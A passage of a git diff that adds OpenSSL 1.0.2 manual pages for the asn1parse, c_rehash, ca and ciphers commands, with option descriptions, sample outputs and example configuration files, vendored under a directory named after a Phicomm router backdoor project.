+[B<-genconf file>]
+
+=head1 DESCRIPTION
+
+The B<asn1parse> command is a diagnostic utility that can parse ASN.1
+structures. It can also be used to extract data from ASN.1 formatted data.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-inform> B<DER|PEM>
+
+the input format. B<DER> is binary format and B<PEM> (the default) is base64
+encoded.
+
+=item B<-in filename>
+
+the input file, default is standard input
+
+=item B<-out filename>
+
+output file to place the DER encoded data into. If this
+option is not present then no data will be output. This is most useful when
+combined with the B<-strparse> option.
+
+=item B<-noout>
+
+don't output the parsed version of the input file.
+
+=item B<-offset number>
+
+starting offset to begin parsing, default is start of file.
+
+=item B<-length number>
+
+number of bytes to parse, default is until end of file.
+
+=item B<-i>
+
+indents the output according to the "depth" of the structures.
+
+=item B<-oid filename>
+
+a file containing additional OBJECT IDENTIFIERs (OIDs). The format of this
+file is described in the NOTES section below.
+
+=item B<-dump>
+
+dump unknown data in hex format.
+
+=item B<-dlimit num>
+
+like B<-dump>, but only the first B<num> bytes are output.
+
+=item B<-strparse offset>
+
+parse the contents octets of the ASN.1 object starting at B<offset>. This
+option can be used multiple times to "drill down" into a nested structure.
+
+=item B<-genstr string>, B<-genconf file>
+
+generate encoded data based on B<string>, B<file> or both using
+L<ASN1_generate_nconf(3)|ASN1_generate_nconf(3)> format. If B<file> only is
+present then the string is obtained from the default section using the name
+B<asn1>. The encoded data is passed through the ASN1 parser and printed out as
+though it came from a file, the contents can thus be examined and written to a
+file using the B<out> option. 
+
+=back
+
+=head2 OUTPUT
+
+The output will typically contain lines like this:
+
+  0:d=0  hl=4 l= 681 cons: SEQUENCE          
+
+.....
+
+  229:d=3  hl=3 l= 141 prim: BIT STRING        
+  373:d=2  hl=3 l= 162 cons: cont [ 3 ]        
+  376:d=3  hl=3 l= 159 cons: SEQUENCE          
+  379:d=4  hl=2 l=  29 cons: SEQUENCE          
+  381:d=5  hl=2 l=   3 prim: OBJECT            :X509v3 Subject Key Identifier
+  386:d=5  hl=2 l=  22 prim: OCTET STRING      
+  410:d=4  hl=2 l= 112 cons: SEQUENCE          
+  412:d=5  hl=2 l=   3 prim: OBJECT            :X509v3 Authority Key Identifier
+  417:d=5  hl=2 l= 105 prim: OCTET STRING      
+  524:d=4  hl=2 l=  12 cons: SEQUENCE          
+
+.....
+
+This example is part of a self signed certificate. Each line starts with the
+offset in decimal. B<d=XX> specifies the current depth. The depth is increased
+within the scope of any SET or SEQUENCE. B<hl=XX> gives the header length
+(tag and length octets) of the current type. B<l=XX> gives the length of
+the contents octets.
+
+The B<-i> option can be used to make the output more readable.
+
+Some knowledge of the ASN.1 structure is needed to interpret the output. 
+
+In this example the BIT STRING at offset 229 is the certificate public key.
+The contents octets of this will contain the public key information. This can
+be examined using the option B<-strparse 229> to yield:
+
+    0:d=0  hl=3 l= 137 cons: SEQUENCE          
+    3:d=1  hl=3 l= 129 prim: INTEGER           :E5D21E1F5C8D208EA7A2166C7FAF9F6BDF2059669C60876DDB70840F1A5AAFA59699FE471F379F1DD6A487E7D5409AB6A88D4A9746E24B91D8CF55DB3521015460C8EDE44EE8A4189F7A7BE77D6CD3A9AF2696F486855CF58BF0EDF2B4068058C7A947F52548DDF7E15E96B385F86422BEA9064A3EE9E1158A56E4A6F47E5897
+  135:d=1  hl=2 l=   3 prim: INTEGER           :010001
+
+=head1 NOTES
+
+If an OID is not part of OpenSSL's internal table it will be represented in
+numerical form (for example 1.2.3.4). The file passed to the B<-oid> option 
+allows additional OIDs to be included. Each line consists of three columns,
+the first column is the OID in numerical format and should be followed by white
+space. The second column is the "short name" which is a single word followed
+by white space. The final column is the rest of the line and is the
+"long name". B<asn1parse> displays the long name. Example:
+
+C<1.2.3.4	shortName	A long name>
+
+=head1 EXAMPLES
+
+Parse a file:
+
+ openssl asn1parse -in file.pem
+
+Parse a DER file:
+
+ openssl asn1parse -inform DER -in file.der
+
+Generate a simple UTF8String:
+
+ openssl asn1parse -genstr 'UTF8:Hello World'
+
+Generate and write out a UTF8String, don't print parsed output:
+
+ openssl asn1parse -genstr 'UTF8:Hello World' -noout -out utf8.der
+
+Generate using a config file:
+
+ openssl asn1parse -genconf asn1.cnf -noout -out asn1.der
+
+Example config file:
+
+ asn1=SEQUENCE:seq_sect
+
+ [seq_sect]
+
+ field1=BOOL:TRUE
+ field2=EXP:0, UTF8:some random string
+
+
+=head1 BUGS
+
+There should be options to change the format of output lines. The output of some
+ASN.1 types is not well handled (if at all).
+
+=head1 SEE ALSO
+
+L<ASN1_generate_nconf(3)|ASN1_generate_nconf(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/c_rehash.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/c_rehash.pod
new file mode 100644
index 0000000..ccce29e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/c_rehash.pod
@@ -0,0 +1,114 @@
+=pod
+
+=for comment
+Original text by James Westby, contributed under the OpenSSL license.
+
+=head1 NAME
+
+c_rehash - Create symbolic links to files named by the hash values
+
+=head1 SYNOPSIS
+
+B<c_rehash>
+B<[-old]>
+B<[-h]>
+B<[-n]>
+B<[-v]>
+[ I<directory>...]
+
+=head1 DESCRIPTION
+
+B<c_rehash> scans directories and calculates a hash value of each
+C<.pem>, C<.crt>, C<.cer>, or C<.crl>
+file in the specified directory list and creates symbolic links
+for each file, where the name of the link is the hash value.
+(If the platform does not support symbolic links, a copy is made.)
+This utility is useful as many programs that use OpenSSL require
+directories to be set up like this in order to find certificates.
+
+If any directories are named on the command line, then those are
+processed in turn. If not, then the B<SSL_CERT_DIR> environment variable
+is consulted; this shold be a colon-separated list of directories,
+like the Unix B<PATH> variable.
+If that is not set then the default directory (installation-specific
+but often B</usr/local/ssl/certs>) is processed.
+
+In order for a directory to be processed, the user must have write
+permissions on that directory, otherwise it will be skipped.
+The links created are of the form C<HHHHHHHH.D>, where each B<H>
+is a hexadecimal character and B<D> is a single decimal digit.
+When processing a directory, B<c_rehash> will first remove all links
+that have a name in that syntax. If you have links in that format
+used for other purposes, they will be removed.
+To skip the removal step, use the B<-n> flag.
+Hashes for CRL's look similar except the letter B<r> appears after
+the period, like this: C<HHHHHHHH.rD>.
+
+Multiple objects may have the same hash; they will be indicated by
+incrementing the B<D> value. Duplicates are found by comparing the
+full SHA-1 fingerprint. A warning will be displayed if a duplicate
+is found.
+
+A warning will also be displayed if there are files that
+cannot be parsed as either a certificate or a CRL.
+
+The program uses the B<openssl> program to compute the hashes and
+fingerprints. If not found in the user's B<PATH>, then set the
+B<OPENSSL> environment variable to the full pathname.
+Any program can be used, it will be invoked as follows for either
+a certificate or CRL:
+
+  $OPENSSL x509 -hash -fingerprint -noout -in FILENAME
+  $OPENSSL crl -hash -fingerprint -noout -in FILENAME
+
+where B<FILENAME> is the filename. It must output the hash of the
+file on the first line, and the fingerprint on the second,
+optionally prefixed with some text and an equals sign.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-old>
+
+Use old-style hashing (MD5, as opposed to SHA-1) for generating
+links for releases before 1.0.0.  Note that current versions will
+not use the old style.
+
+=item B<-h>
+
+Display a brief usage message.
+
+=item B<-n>
+
+Do not remove existing links.
+This is needed when keeping new and old-style links in the same directory.
+
+=item B<-v>
+
+Print messages about old links removed and new links created.
+By default, B<c_rehash> only lists each directory as it is processed.
+
+=back
+
+=head1 ENVIRONMENT
+
+=over
+
+=item B<OPENSSL>
+
+The path to an executable to use to generate hashes and
+fingerprints (see above).
+
+=item B<SSL_CERT_DIR>
+
+Colon separated list of directories to operate on.
+Ignored if directories are listed on the command line.
+
+=back
+
+=head1 SEE ALSO
+
+L<openssl(1)|openssl(1)>,
+L<crl(1)|crl(1)>.
+L<x509(1)|x509(1)>.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ca.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ca.pod
new file mode 100644
index 0000000..c90e648
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ca.pod
@@ -0,0 +1,696 @@
+
+=pod
+
+=head1 NAME
+
+ca - sample minimal CA application
+
+=head1 SYNOPSIS
+
+B<openssl> B<ca>
+[B<-verbose>]
+[B<-config filename>]
+[B<-name section>]
+[B<-gencrl>]
+[B<-revoke file>]
+[B<-status serial>]
+[B<-updatedb>]
+[B<-crl_reason reason>]
+[B<-crl_hold instruction>]
+[B<-crl_compromise time>]
+[B<-crl_CA_compromise time>]
+[B<-crldays days>]
+[B<-crlhours hours>]
+[B<-crlexts section>]
+[B<-startdate date>]
+[B<-enddate date>]
+[B<-days arg>]
+[B<-md arg>]
+[B<-policy arg>]
+[B<-keyfile arg>]
+[B<-keyform PEM|DER>]
+[B<-key arg>]
+[B<-passin arg>]
+[B<-cert file>]
+[B<-selfsign>]
+[B<-in file>]
+[B<-out file>]
+[B<-notext>]
+[B<-outdir dir>]
+[B<-infiles>]
+[B<-spkac file>]
+[B<-ss_cert file>]
+[B<-preserveDN>]
+[B<-noemailDN>]
+[B<-batch>]
+[B<-msie_hack>]
+[B<-extensions section>]
+[B<-extfile section>]
+[B<-engine id>]
+[B<-subj arg>]
+[B<-utf8>]
+[B<-multivalue-rdn>]
+
+=head1 DESCRIPTION
+
+The B<ca> command is a minimal CA application. It can be used
+to sign certificate requests in a variety of forms and generate
+CRLs it also maintains a text database of issued certificates
+and their status.
+
+The options descriptions will be divided into each purpose.
+
+=head1 CA OPTIONS
+
+=over 4
+
+=item B<-config filename>
+
+specifies the configuration file to use.
+
+=item B<-name section>
+
+specifies the configuration file section to use (overrides
+B<default_ca> in the B<ca> section).
+
+=item B<-in filename>
+
+an input filename containing a single certificate request to be
+signed by the CA.
+
+=item B<-ss_cert filename>
+
+a single self signed certificate to be signed by the CA.
+
+=item B<-spkac filename>
+
+a file containing a single Netscape signed public key and challenge
+and additional field values to be signed by the CA. See the B<SPKAC FORMAT>
+section for information on the required input and output format.
+
+=item B<-infiles>
+
+if present this should be the last option, all subsequent arguments
+are assumed to the the names of files containing certificate requests. 
+
+=item B<-out filename>
+
+the output file to output certificates to. The default is standard
+output. The certificate details will also be printed out to this
+file in PEM format (except that B<-spkac> outputs DER format).
+
+=item B<-outdir directory>
+
+the directory to output certificates to. The certificate will be
+written to a filename consisting of the serial number in hex with
+".pem" appended.
+
+=item B<-cert>
+
+the CA certificate file.
+
+=item B<-keyfile filename>
+
+the private key to sign requests with.
+
+=item B<-keyform PEM|DER>
+
+the format of the data in the private key file.
+The default is PEM.
+
+=item B<-key password>
+
+the password used to encrypt the private key. Since on some
+systems the command line arguments are visible (e.g. Unix with
+the 'ps' utility) this option should be used with caution.
+
+=item B<-selfsign>
+
+indicates the issued certificates are to be signed with the key
+the certificate requests were signed with (given with B<-keyfile>).
+Cerificate requests signed with a different key are ignored.  If
+B<-spkac>, B<-ss_cert> or B<-gencrl> are given, B<-selfsign> is
+ignored.
+
+A consequence of using B<-selfsign> is that the self-signed
+certificate appears among the entries in the certificate database
+(see the configuration option B<database>), and uses the same
+serial number counter as all other certificates sign with the
+self-signed certificate.
+
+=item B<-passin arg>
+
+the key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-verbose>
+
+this prints extra details about the operations being performed.
+
+=item B<-notext>
+
+don't output the text form of a certificate to the output file.
+
+=item B<-startdate date>
+
+this allows the start date to be explicitly set. The format of the
+date is YYMMDDHHMMSSZ (the same as an ASN1 UTCTime structure).
+
+=item B<-enddate date>
+
+this allows the expiry date to be explicitly set. The format of the
+date is YYMMDDHHMMSSZ (the same as an ASN1 UTCTime structure).
+
+=item B<-days arg>
+
+the number of days to certify the certificate for.
+
+=item B<-md alg>
+
+the message digest to use. Possible values include md5, sha1 and mdc2.
+This option also applies to CRLs.
+
+=item B<-policy arg>
+
+this option defines the CA "policy" to use. This is a section in
+the configuration file which decides which fields should be mandatory
+or match the CA certificate. Check out the B<POLICY FORMAT> section
+for more information.
+
+=item B<-msie_hack>
+
+this is a legacy option to make B<ca> work with very old versions of
+the IE certificate enrollment control "certenr3". It used UniversalStrings
+for almost everything. Since the old control has various security bugs
+its use is strongly discouraged. The newer control "Xenroll" does not
+need this option.
+
+=item B<-preserveDN>
+
+Normally the DN order of a certificate is the same as the order of the
+fields in the relevant policy section. When this option is set the order 
+is the same as the request. This is largely for compatibility with the
+older IE enrollment control which would only accept certificates if their
+DNs match the order of the request. This is not needed for Xenroll.
+
+=item B<-noemailDN>
+
+The DN of a certificate can contain the EMAIL field if present in the
+request DN, however it is good policy just having the e-mail set into
+the altName extension of the certificate. When this option is set the
+EMAIL field is removed from the certificate' subject and set only in
+the, eventually present, extensions. The B<email_in_dn> keyword can be
+used in the configuration file to enable this behaviour.
+
+=item B<-batch>
+
+this sets the batch mode. In this mode no questions will be asked
+and all certificates will be certified automatically.
+
+=item B<-extensions section>
+
+the section of the configuration file containing certificate extensions
+to be added when a certificate is issued (defaults to B<x509_extensions>
+unless the B<-extfile> option is used). If no extension section is
+present then, a V1 certificate is created. If the extension section
+is present (even if it is empty), then a V3 certificate is created. See the:w
+L<x509v3_config(5)|x509v3_config(5)> manual page for details of the
+extension section format.
+
+=item B<-extfile file>
+
+an additional configuration file to read certificate extensions from
+(using the default section unless the B<-extensions> option is also
+used).
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<ca>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=item B<-subj arg>
+
+supersedes subject name given in the request.
+The arg must be formatted as I</type0=value0/type1=value1/type2=...>,
+characters may be escaped by \ (backslash), no spaces are skipped.
+
+=item B<-utf8>
+
+this option causes field values to be interpreted as UTF8 strings, by 
+default they are interpreted as ASCII. This means that the field
+values, whether prompted from a terminal or obtained from a
+configuration file, must be valid UTF8 strings.
+
+=item B<-multivalue-rdn>
+
+this option causes the -subj argument to be interpretedt with full
+support for multivalued RDNs. Example:
+
+I</DC=org/DC=OpenSSL/DC=users/UID=123456+CN=John Doe>
+
+If -multi-rdn is not used then the UID value is I<123456+CN=John Doe>.
+
+=back
+
+=head1 CRL OPTIONS
+
+=over 4
+
+=item B<-gencrl>
+
+this option generates a CRL based on information in the index file.
+
+=item B<-crldays num>
+
+the number of days before the next CRL is due. That is the days from
+now to place in the CRL nextUpdate field.
+
+=item B<-crlhours num>
+
+the number of hours before the next CRL is due.
+
+=item B<-revoke filename>
+
+a filename containing a certificate to revoke.
+
+=item B<-status serial>
+
+displays the revocation status of the certificate with the specified
+serial number and exits.
+
+=item B<-updatedb>
+
+Updates the database index to purge expired certificates.
+
+=item B<-crl_reason reason>
+
+revocation reason, where B<reason> is one of: B<unspecified>, B<keyCompromise>,
+B<CACompromise>, B<affiliationChanged>, B<superseded>, B<cessationOfOperation>,
+B<certificateHold> or B<removeFromCRL>. The matching of B<reason> is case
+insensitive. Setting any revocation reason will make the CRL v2.
+
+In practive B<removeFromCRL> is not particularly useful because it is only used
+in delta CRLs which are not currently implemented.
+
+=item B<-crl_hold instruction>
+
+This sets the CRL revocation reason code to B<certificateHold> and the hold
+instruction to B<instruction> which must be an OID. Although any OID can be
+used only B<holdInstructionNone> (the use of which is discouraged by RFC2459)
+B<holdInstructionCallIssuer> or B<holdInstructionReject> will normally be used.
+
+=item B<-crl_compromise time>
+
+This sets the revocation reason to B<keyCompromise> and the compromise time to
+B<time>. B<time> should be in GeneralizedTime format that is B<YYYYMMDDHHMMSSZ>.
+
+=item B<-crl_CA_compromise time>
+
+This is the same as B<crl_compromise> except the revocation reason is set to
+B<CACompromise>.
+
+=item B<-crlexts section>
+
+the section of the configuration file containing CRL extensions to
+include. If no CRL extension section is present then a V1 CRL is
+created, if the CRL extension section is present (even if it is
+empty) then a V2 CRL is created. The CRL extensions specified are
+CRL extensions and B<not> CRL entry extensions.  It should be noted
+that some software (for example Netscape) can't handle V2 CRLs. See
+L<x509v3_config(5)|x509v3_config(5)> manual page for details of the
+extension section format.
+
+=back
+
+=head1 CONFIGURATION FILE OPTIONS
+
+The section of the configuration file containing options for B<ca>
+is found as follows: If the B<-name> command line option is used,
+then it names the section to be used. Otherwise the section to
+be used must be named in the B<default_ca> option of the B<ca> section
+of the configuration file (or in the default section of the
+configuration file). Besides B<default_ca>, the following options are
+read directly from the B<ca> section:
+ RANDFILE
+ preserve
+ msie_hack
+With the exception of B<RANDFILE>, this is probably a bug and may
+change in future releases.
+
+Many of the configuration file options are identical to command line
+options. Where the option is present in the configuration file
+and the command line the command line value is used. Where an
+option is described as mandatory then it must be present in
+the configuration file or the command line equivalent (if
+any) used.
+
+=over 4
+
+=item B<oid_file>
+
+This specifies a file containing additional B<OBJECT IDENTIFIERS>.
+Each line of the file should consist of the numerical form of the
+object identifier followed by white space then the short name followed
+by white space and finally the long name. 
+
+=item B<oid_section>
+
+This specifies a section in the configuration file containing extra
+object identifiers. Each line should consist of the short name of the
+object identifier followed by B<=> and the numerical form. The short
+and long names are the same when this option is used.
+
+=item B<new_certs_dir>
+
+the same as the B<-outdir> command line option. It specifies
+the directory where new certificates will be placed. Mandatory.
+
+=item B<certificate>
+
+the same as B<-cert>. It gives the file containing the CA
+certificate. Mandatory.
+
+=item B<private_key>
+
+same as the B<-keyfile> option. The file containing the
+CA private key. Mandatory.
+
+=item B<RANDFILE>
+
+a file used to read and write random number seed information, or
+an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+
+=item B<default_days>
+
+the same as the B<-days> option. The number of days to certify
+a certificate for. 
+
+=item B<default_startdate>
+
+the same as the B<-startdate> option. The start date to certify
+a certificate for. If not set the current time is used.
+
+=item B<default_enddate>
+
+the same as the B<-enddate> option. Either this option or
+B<default_days> (or the command line equivalents) must be
+present.
+
+=item B<default_crl_hours default_crl_days>
+
+the same as the B<-crlhours> and the B<-crldays> options. These
+will only be used if neither command line option is present. At
+least one of these must be present to generate a CRL.
+
+=item B<default_md>
+
+the same as the B<-md> option. The message digest to use. Mandatory.
+
+=item B<database>
+
+the text database file to use. Mandatory. This file must be present
+though initially it will be empty.
+
+=item B<unique_subject>
+
+if the value B<yes> is given, the valid certificate entries in the
+database must have unique subjects.  if the value B<no> is given,
+several valid certificate entries may have the exact same subject.
+The default value is B<yes>, to be compatible with older (pre 0.9.8)
+versions of OpenSSL.  However, to make CA certificate roll-over easier,
+it's recommended to use the value B<no>, especially if combined with
+the B<-selfsign> command line option.
+
+=item B<serial>
+
+a text file containing the next serial number to use in hex. Mandatory.
+This file must be present and contain a valid serial number.
+
+=item B<crlnumber>
+
+a text file containing the next CRL number to use in hex. The crl number
+will be inserted in the CRLs only if this file exists. If this file is
+present, it must contain a valid CRL number.
+
+=item B<x509_extensions>
+
+the same as B<-extensions>.
+
+=item B<crl_extensions>
+
+the same as B<-crlexts>.
+
+=item B<preserve>
+
+the same as B<-preserveDN>
+
+=item B<email_in_dn>
+
+the same as B<-noemailDN>. If you want the EMAIL field to be removed
+from the DN of the certificate simply set this to 'no'. If not present
+the default is to allow for the EMAIL filed in the certificate's DN.
+
+=item B<msie_hack>
+
+the same as B<-msie_hack>
+
+=item B<policy>
+
+the same as B<-policy>. Mandatory. See the B<POLICY FORMAT> section
+for more information.
+
+=item B<name_opt>, B<cert_opt>
+
+these options allow the format used to display the certificate details
+when asking the user to confirm signing. All the options supported by
+the B<x509> utilities B<-nameopt> and B<-certopt> switches can be used
+here, except the B<no_signame> and B<no_sigdump> are permanently set
+and cannot be disabled (this is because the certificate signature cannot
+be displayed because the certificate has not been signed at this point).
+
+For convenience the values B<ca_default> are accepted by both to produce
+a reasonable output.
+
+If neither option is present the format used in earlier versions of
+OpenSSL is used. Use of the old format is B<strongly> discouraged because
+it only displays fields mentioned in the B<policy> section, mishandles
+multicharacter string types and does not display extensions.
+
+=item B<copy_extensions>
+
+determines how extensions in certificate requests should be handled.
+If set to B<none> or this option is not present then extensions are
+ignored and not copied to the certificate. If set to B<copy> then any
+extensions present in the request that are not already present are copied
+to the certificate. If set to B<copyall> then all extensions in the
+request are copied to the certificate: if the extension is already present
+in the certificate it is deleted first. See the B<WARNINGS> section before
+using this option.
+
+The main use of this option is to allow a certificate request to supply
+values for certain extensions such as subjectAltName.
+
+=back
+
+=head1 POLICY FORMAT
+
+The policy section consists of a set of variables corresponding to
+certificate DN fields. If the value is "match" then the field value
+must match the same field in the CA certificate. If the value is
+"supplied" then it must be present. If the value is "optional" then
+it may be present. Any fields not mentioned in the policy section
+are silently deleted, unless the B<-preserveDN> option is set but
+this can be regarded more of a quirk than intended behaviour.
+
+=head1 SPKAC FORMAT
+
+The input to the B<-spkac> command line option is a Netscape
+signed public key and challenge. This will usually come from
+the B<KEYGEN> tag in an HTML form to create a new private key. 
+It is however possible to create SPKACs using the B<spkac> utility.
+
+The file should contain the variable SPKAC set to the value of
+the SPKAC and also the required DN components as name value pairs.
+If you need to include the same component twice then it can be
+preceded by a number and a '.'.
+
+When processing SPKAC format, the output is DER if the B<-out>
+flag is used, but PEM format if sending to stdout or the B<-outdir>
+flag is used.
+
+=head1 EXAMPLES
+
+Note: these examples assume that the B<ca> directory structure is
+already set up and the relevant files already exist. This usually
+involves creating a CA certificate and private key with B<req>, a
+serial number file and an empty index file and placing them in
+the relevant directories.
+
+To use the sample configuration file below the directories demoCA,
+demoCA/private and demoCA/newcerts would be created. The CA
+certificate would be copied to demoCA/cacert.pem and its private
+key to demoCA/private/cakey.pem. A file demoCA/serial would be
+created containing for example "01" and the empty index file
+demoCA/index.txt.
+
+
+Sign a certificate request:
+
+ openssl ca -in req.pem -out newcert.pem
+
+Sign a certificate request, using CA extensions:
+
+ openssl ca -in req.pem -extensions v3_ca -out newcert.pem
+
+Generate a CRL
+
+ openssl ca -gencrl -out crl.pem
+
+Sign several requests:
+
+ openssl ca -infiles req1.pem req2.pem req3.pem
+
+Certify a Netscape SPKAC:
+
+ openssl ca -spkac spkac.txt
+
+A sample SPKAC file (the SPKAC line has been truncated for clarity):
+
+ SPKAC=MIG0MGAwXDANBgkqhkiG9w0BAQEFAANLADBIAkEAn7PDhCeV/xIxUg8V70YRxK2A5
+ CN=Steve Test
+ emailAddress=steve@openssl.org
+ 0.OU=OpenSSL Group
+ 1.OU=Another Group
+
+A sample configuration file with the relevant sections for B<ca>:
+
+ [ ca ]
+ default_ca      = CA_default            # The default ca section
+ 
+ [ CA_default ]
+
+ dir            = ./demoCA              # top dir
+ database       = $dir/index.txt        # index file.
+ new_certs_dir	= $dir/newcerts         # new certs dir
+ 
+ certificate    = $dir/cacert.pem       # The CA cert
+ serial         = $dir/serial           # serial no file
+ private_key    = $dir/private/cakey.pem# CA private key
+ RANDFILE       = $dir/private/.rand    # random number file
+ 
+ default_days   = 365                   # how long to certify for
+ default_crl_days= 30                   # how long before next CRL
+ default_md     = md5                   # md to use
+
+ policy         = policy_any            # default policy
+ email_in_dn    = no                    # Don't add the email into cert DN
+
+ name_opt	= ca_default		# Subject name display option
+ cert_opt	= ca_default		# Certificate display option
+ copy_extensions = none			# Don't copy extensions from request
+
+ [ policy_any ]
+ countryName            = supplied
+ stateOrProvinceName    = optional
+ organizationName       = optional
+ organizationalUnitName = optional
+ commonName             = supplied
+ emailAddress           = optional
+
+=head1 FILES
+
+Note: the location of all files can change either by compile time options,
+configuration file entries, environment variables or command line options.
+The values below reflect the default values.
+
+ /usr/local/ssl/lib/openssl.cnf - master configuration file
+ ./demoCA                       - main CA directory
+ ./demoCA/cacert.pem            - CA certificate
+ ./demoCA/private/cakey.pem     - CA private key
+ ./demoCA/serial                - CA serial number file
+ ./demoCA/serial.old            - CA serial number backup file
+ ./demoCA/index.txt             - CA text database file
+ ./demoCA/index.txt.old         - CA text database backup file
+ ./demoCA/certs                 - certificate output file
+ ./demoCA/.rnd                  - CA random seed information
+
+=head1 ENVIRONMENT VARIABLES
+
+B<OPENSSL_CONF> reflects the location of master configuration file it can
+be overridden by the B<-config> command line option.
+
+=head1 RESTRICTIONS
+
+The text database index file is a critical part of the process and 
+if corrupted it can be difficult to fix. It is theoretically possible
+to rebuild the index file from all the issued certificates and a current
+CRL: however there is no option to do this.
+
+V2 CRL features like delta CRLs are not currently supported.
+
+Although several requests can be input and handled at once it is only
+possible to include one SPKAC or self signed certificate.
+
+=head1 BUGS
+
+The use of an in memory text database can cause problems when large
+numbers of certificates are present because, as the name implies
+the database has to be kept in memory.
+
+The B<ca> command really needs rewriting or the required functionality
+exposed at either a command or interface level so a more friendly utility
+(perl script or GUI) can handle things properly. The scripts B<CA.sh> and
+B<CA.pl> help a little but not very much.
+
+Any fields in a request that are not present in a policy are silently
+deleted. This does not happen if the B<-preserveDN> option is used. To
+enforce the absence of the EMAIL field within the DN, as suggested by
+RFCs, regardless the contents of the request' subject the B<-noemailDN>
+option can be used. The behaviour should be more friendly and
+configurable.
+
+Cancelling some commands by refusing to certify a certificate can
+create an empty file.
+
+=head1 WARNINGS
+
+The B<ca> command is quirky and at times downright unfriendly.
+
+The B<ca> utility was originally meant as an example of how to do things
+in a CA. It was not supposed to be used as a full blown CA itself:
+nevertheless some people are using it for this purpose.
+
+The B<ca> command is effectively a single user command: no locking is
+done on the various files and attempts to run more than one B<ca> command
+on the same database can have unpredictable results.
+
+The B<copy_extensions> option should be used with caution. If care is
+not taken then it can be a security risk. For example if a certificate
+request contains a basicConstraints extension with CA:TRUE and the
+B<copy_extensions> value is set to B<copyall> and the user does not spot
+this when the certificate is displayed then this will hand the requestor
+a valid CA certificate.
+
+This situation can be avoided by setting B<copy_extensions> to B<copy>
+and including basicConstraints with CA:FALSE in the configuration file.
+Then if the request contains a basicConstraints extension it will be
+ignored.
+
+It is advisable to also include values for other extensions such
+as B<keyUsage> to prevent a request supplying its own values.
+
+Additional restrictions can be placed on the CA certificate itself.
+For example if the CA certificate has:
+
+ basicConstraints = CA:TRUE, pathlen:0
+
+then even if a certificate is issued with CA:TRUE it will not be valid.
+
+=head1 SEE ALSO
+
+L<req(1)|req(1)>, L<spkac(1)|spkac(1)>, L<x509(1)|x509(1)>, L<CA.pl(1)|CA.pl(1)>,
+L<config(5)|config(5)>, L<x509v3_config(5)|x509v3_config(5)> 
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ciphers.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ciphers.pod
new file mode 100644
index 0000000..4eeb55b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ciphers.pod
@@ -0,0 +1,638 @@
+=pod
+
+=head1 NAME
+
+ciphers - SSL cipher display and cipher list tool.
+
+=head1 SYNOPSIS
+
+B<openssl> B<ciphers>
+[B<-v>]
+[B<-V>]
+[B<-ssl2>]
+[B<-ssl3>]
+[B<-tls1>]
+[B<cipherlist>]
+
+=head1 DESCRIPTION
+
+The B<ciphers> command converts textual OpenSSL cipher lists into ordered
+SSL cipher preference lists. It can be used as a test tool to determine
+the appropriate cipherlist.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-v>
+
+Verbose option. List ciphers with a complete description of
+protocol version (SSLv2 or SSLv3; the latter includes TLS), key exchange,
+authentication, encryption and mac algorithms used along with any key size
+restrictions and whether the algorithm is classed as an "export" cipher.
+Note that without the B<-v> option, ciphers may seem to appear twice
+in a cipher list; this is when similar ciphers are available for
+SSL v2 and for SSL v3/TLS v1.
+
+=item B<-V>
+
+Like B<-v>, but include cipher suite codes in output (hex format).
+
+=item B<-ssl3>
+
+only include SSL v3 ciphers.
+
+=item B<-ssl2>
+
+only include SSL v2 ciphers.
+
+=item B<-tls1>
+
+only include TLS v1 ciphers.
+
+=item B<-h>, B<-?>
+
+print a brief usage message.
+
+=item B<cipherlist>
+
+a cipher list to convert to a cipher preference list. If it is not included
+then the default cipher list will be used. The format is described below.
+
+=back
+
+=head1 CIPHER LIST FORMAT
+
+The cipher list consists of one or more I<cipher strings> separated by colons.
+Commas or spaces are also acceptable separators but colons are normally used.
+
+The actual cipher string can take several different forms.
+
+It can consist of a single cipher suite such as B<RC4-SHA>.
+
+It can represent a list of cipher suites containing a certain algorithm, or
+cipher suites of a certain type. For example B<SHA1> represents all ciphers
+suites using the digest algorithm SHA1 and B<SSLv3> represents all SSL v3
+algorithms.
+
+Lists of cipher suites can be combined in a single cipher string using the
+B<+> character. This is used as a logical B<and> operation. For example
+B<SHA1+DES> represents all cipher suites containing the SHA1 B<and> the DES
+algorithms.
+
+Each cipher string can be optionally preceded by the characters B<!>,
+B<-> or B<+>.
+
+If B<!> is used then the ciphers are permanently deleted from the list.
+The ciphers deleted can never reappear in the list even if they are
+explicitly stated.
+
+If B<-> is used then the ciphers are deleted from the list, but some or
+all of the ciphers can be added again by later options.
+
+If B<+> is used then the ciphers are moved to the end of the list. This
+option doesn't add any new ciphers it just moves matching existing ones.
+
+If none of these characters is present then the string is just interpreted
+as a list of ciphers to be appended to the current preference list. If the
+list includes any ciphers already present they will be ignored: that is they
+will not moved to the end of the list.
+
+Additionally the cipher string B<@STRENGTH> can be used at any point to sort
+the current cipher list in order of encryption algorithm key length.
+
+=head1 CIPHER STRINGS
+
+The following is a list of all permitted cipher strings and their meanings.
+
+=over 4
+
+=item B<DEFAULT>
+
+the default cipher list. This is determined at compile time and, as of OpenSSL
+1.0.0, is normally B<ALL:!aNULL:!eNULL>. This must be the first cipher string
+specified.
+
+=item B<COMPLEMENTOFDEFAULT>
+
+the ciphers included in B<ALL>, but not enabled by default. Currently
